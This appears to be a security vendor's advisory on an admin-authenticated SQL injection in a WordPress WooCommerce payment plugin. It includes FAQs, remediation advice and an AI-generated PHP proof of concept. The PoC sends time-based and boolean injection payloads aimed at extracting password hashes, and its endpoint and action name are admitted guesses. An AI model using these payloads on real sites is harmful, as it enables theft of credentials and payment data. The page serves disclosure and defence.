What is CVE-2026-1370?

CVE-2026-1370 is a medium severity SQL injection vulnerability in the SIBS WooCommerce payment gateway plugin for WordPress. It allows authenticated users with Administrator-level access to exploit the ‘referencedId’ parameter, potentially extracting sensitive data from the database.

How does the SQL injection work?

The vulnerability arises from insufficient escaping of the ‘referencedId’ parameter in SQL queries. An attacker can inject malicious SQL code, allowing them to execute additional queries and retrieve sensitive information from the database.

Who is affected by this vulnerability?

Any WordPress site using the SIBS WooCommerce plugin version 2.2.0 or earlier is affected. Administrators should check their plugin version and update if necessary.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the SIBS WooCommerce plugin installed. If it is version 2.2.0 or earlier, your site is susceptible to this vulnerability.

What is the CVSS score and what does it mean?

The CVSS score for CVE-2026-1370 is 4.9, indicating a medium severity vulnerability. This score reflects the potential impact on confidentiality, requiring administrative privileges for exploitation.

How can I mitigate this vulnerability?

To mitigate this vulnerability, update the SIBS WooCommerce plugin to the latest version. Additionally, ensure that input validation and parameterized queries are used in your code to prevent SQL injection.

What are the implications of successful exploitation?

Successful exploitation could allow an attacker to extract sensitive information from the database, including user credentials and payment data. This poses a significant risk to the security of your WordPress site.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can authenticate as an administrator and send a crafted request to exploit the vulnerability. It shows how a malicious SQL payload can be injected via the ‘referencedId’ parameter.

Is there a specific endpoint that is vulnerable?

While the exact endpoint is not specified, it is likely to be an AJAX handler such as admin-ajax.php. The vulnerability can be exploited through crafted requests targeting this endpoint.

What are the best practices to prevent SQL injection?

To prevent SQL injection, always use prepared statements for database queries and validate user input. Avoid directly concatenating user input into SQL queries and utilize WordPress’s built-in functions for secure database interactions.

Can this vulnerability lead to privilege escalation?

No, this vulnerability does not directly enable privilege escalation. However, if an attacker compromises an administrative account, they can exploit this vulnerability to exfiltrate sensitive data.

How should I respond if my site has been compromised?

If your site has been compromised, immediately update the plugin, change all passwords, and review user accounts for unauthorized access. Conduct a thorough security audit to assess the extent of the breach.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1370: SIBS – WooCommerce <= 2.2.0 – Authenticated (Admin+) SQL Injection via 'referencedId' Parameter (sibs-woocommerce)

CVE ID CVE-2026-1370

Plugin sibs-woocommerce

Severity Medium (CVSS 4.9)

CWE 89

Vulnerable Version 2.2.0

Patched Version —

Disclosed February 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1370 (metadata-based):
This vulnerability is an authenticated SQL injection in the SIBS WooCommerce payment gateway plugin for WordPress. The flaw exists in the ‘referencedId’ parameter handling within plugin versions up to and including 2.2.0. Attackers with Administrator-level access can execute time-based blind SQL injection attacks to extract sensitive data from the database. The CVSS score of 4.9 reflects the high confidentiality impact tempered by the requirement for administrative privileges.

Atomic Edge research identifies the root cause as improper neutralization of special elements in an SQL command (CWE-89). The vulnerability description confirms insufficient escaping and lack of prepared statements for user-supplied input in the ‘referencedId’ parameter. Without source code, we infer the plugin likely constructs SQL queries by directly concatenating this parameter into a database query string. This inference is consistent with the CWE classification and the described time-based SQL injection attack vector.

Exploitation requires an authenticated WordPress administrator to send a crafted HTTP request containing a malicious SQL payload in the ‘referencedId’ parameter. The exact endpoint is unspecified, but WordPress plugin patterns suggest an AJAX handler (admin-ajax.php) or a custom admin page. A payload like ‘ OR SLEEP(5)–‘ would trigger a measurable delay if the parameter is vulnerable. Attackers would use incremental boolean-based or time-based payloads to extract database information character by character.

Remediation requires implementing proper input validation and parameterized queries. The plugin should use WordPress’s $wpdb->prepare() method or equivalent prepared statements when constructing SQL queries with user input. The ‘referencedId’ parameter should be validated as an integer using functions like intval() or absint() before database interaction. Output escaping functions like esc_sql() are insufficient for preventing SQL injection and should not replace prepared statements.

Successful exploitation allows complete database compromise. Attackers can extract sensitive information including WordPress user credentials (hashed passwords), WooCommerce customer data, payment information, and plugin-specific configuration. While the administrative privilege requirement limits the attack surface, compromised admin accounts could use this vulnerability to exfiltrate the entire database contents. The vulnerability does not directly enable privilege escalation or remote code execution based on the available metadata.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-1370 - SIBS - WooCommerce <= 2.2.0 - Authenticated (Admin+) SQL Injection via 'referencedId' Parameter
<?php
/**
 * Proof of Concept for CVE-2026-1370
 * ASSUMPTIONS:
 * 1. The vulnerable endpoint is an AJAX handler at /wp-admin/admin-ajax.php
 * 2. The AJAX action name contains 'sibs' based on the plugin slug
 * 3. The 'referencedId' parameter is passed via POST
 * 4. Administrator credentials are known
 */

$target_url = 'https://target-site.com/wp-admin/admin-ajax.php';
$username = 'admin';
$password = 'password';

// Initialize cURL session for authentication
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');

// First, authenticate to WordPress
$login_url = str_replace('admin-ajax.php', 'wp-login.php', $target_url);
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url,
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $login_data);
$response = curl_exec($ch);

// Check authentication success by looking for dashboard redirect
if (strpos($response, 'Dashboard') === false && strpos($response, 'wp-admin') === false) {
    die('Authentication failed. Check credentials.');
}

// Time-based SQL injection payload
// This payload causes a 5-second delay if the parameter is vulnerable
$payload = "1' OR SLEEP(5)--";

// Construct exploit request
// Assumed AJAX action based on plugin slug patterns
$exploit_data = array(
    'action' => 'sibs_process_reference',  // Inferred action name
    'referencedId' => $payload,
    'nonce' => 'dummy_nonce'  // Nonce may be required but could be bypassed
);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $exploit_data);

// Measure response time
$start_time = microtime(true);
$response = curl_exec($ch);
$end_time = microtime(true);
$response_time = $end_time - $start_time;

curl_close($ch);

// Analyze results
if ($response_time >= 5) {
    echo "[+] VULNERABLE: Response delayed by " . round($response_time, 2) . " secondsn";
    echo "[+] Confirmed time-based SQL injection via referencedId parametern";
    
    // Example of data extraction payload
    echo "[+] Next step: Use boolean-based payloads like:n";
    echo "    ' OR (SELECT SUBSTRING(user_pass,1,1) FROM wp_users WHERE ID=1)='a'--n";
    echo "    to extract sensitive data character by character.n";
} else {
    echo "[-] NOT VULNERABLE: Response time " . round($response_time, 2) . " secondsn";
    echo "[-] The endpoint or action name may differ from assumptions.n";
    echo "[-] Try enumerating AJAX actions: grep -r 'wp_ajax_' in plugin files.n";
}

// Display raw response for debugging
echo "nResponse preview:n" . substr($response, 0, 500) . "...n";
?>

Frequently Asked Questions

What is CVE-2026-1370?
Overview of the vulnerability
CVE-2026-1370 is a medium severity SQL injection vulnerability in the SIBS WooCommerce payment gateway plugin for WordPress. It allows authenticated users with Administrator-level access to exploit the ‘referencedId’ parameter, potentially extracting sensitive data from the database.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from insufficient escaping of the ‘referencedId’ parameter in SQL queries. An attacker can inject malicious SQL code, allowing them to execute additional queries and retrieve sensitive information from the database.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the SIBS WooCommerce plugin version 2.2.0 or earlier is affected. Administrators should check their plugin version and update if necessary.
How can I check if my site is vulnerable?
Version verification
To determine if your site is vulnerable, check the version of the SIBS WooCommerce plugin installed. If it is version 2.2.0 or earlier, your site is susceptible to this vulnerability.
What is the CVSS score and what does it mean?
Understanding the severity rating
The CVSS score for CVE-2026-1370 is 4.9, indicating a medium severity vulnerability. This score reflects the potential impact on confidentiality, requiring administrative privileges for exploitation.
How can I mitigate this vulnerability?
Recommended remediation steps
To mitigate this vulnerability, update the SIBS WooCommerce plugin to the latest version. Additionally, ensure that input validation and parameterized queries are used in your code to prevent SQL injection.
What are the implications of successful exploitation?
Potential risks and data exposure
Successful exploitation could allow an attacker to extract sensitive information from the database, including user credentials and payment data. This poses a significant risk to the security of your WordPress site.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can authenticate as an administrator and send a crafted request to exploit the vulnerability. It shows how a malicious SQL payload can be injected via the ‘referencedId’ parameter.
Is there a specific endpoint that is vulnerable?
Identifying the attack vector
While the exact endpoint is not specified, it is likely to be an AJAX handler such as admin-ajax.php. The vulnerability can be exploited through crafted requests targeting this endpoint.
What are the best practices to prevent SQL injection?
General security recommendations
To prevent SQL injection, always use prepared statements for database queries and validate user input. Avoid directly concatenating user input into SQL queries and utilize WordPress’s built-in functions for secure database interactions.
Can this vulnerability lead to privilege escalation?
Assessing the risk of account takeover
No, this vulnerability does not directly enable privilege escalation. However, if an attacker compromises an administrative account, they can exploit this vulnerability to exfiltrate sensitive data.
How should I respond if my site has been compromised?
Incident response steps
If your site has been compromised, immediately update the plugin, change all passwords, and review user accounts for unauthorized access. Conduct a thorough security audit to assess the extent of the breach.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations